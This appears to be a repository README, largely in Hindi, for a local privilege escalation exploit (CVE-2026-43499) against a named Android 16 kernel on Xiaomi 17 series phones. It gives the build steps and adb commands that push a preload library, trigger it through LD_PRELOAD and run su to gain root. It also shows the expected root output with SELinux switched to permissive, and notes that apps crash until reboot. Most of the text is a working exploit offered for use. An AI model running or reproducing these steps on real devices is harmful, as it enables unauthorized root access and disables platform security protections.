
CVE-2026-43499 Implementation for 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
popsicleयह भंडार Xiaomi 17 Pro Max (popsicle) पर Android 16 के लिए CVE-2026-43499 स्थानीय विशेषाधिकार वृद्धि कार्यान्वयन शामिल करता है। सत्यापित कर्नेल:
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
इस कर्नेल का उपयोग करने वाले Xiaomi 17, Pro और Ultra श्रृंखला सभी सत्यापित हैं और उपलब्ध हैं।
Python 3 और llvm-objdump पर निर्भरता:
python3 generate_target.py \
--boot boot.img \
--xbl-config xbl_config.img \
-o source/src/target.h
make -C source clean preload
जब NDK स्वचालित रूप से खोजा नहीं जा सकता:
NDK_ROOT=/path/to/android-ndk make -C source clean preload
अंतिम उत्पाद:
source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
सफलता पर दिखाई देता है:
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
शोषण पूरा होने के बाद, स्क्रीन चालू कर सकते हैं, अनलॉक कर सकते हैं और डेस्कटॉप में प्रवेश कर सकते हैं, लेकिन नए लॉन्च किए गए Android ऐप फ्रेमवर्क प्रारंभिकरण पूरा नहीं कर पाते और क्रैश हो जाते हैं; रिबूट के बाद ऐप सामान्य रूप से लॉन्च होते हैं।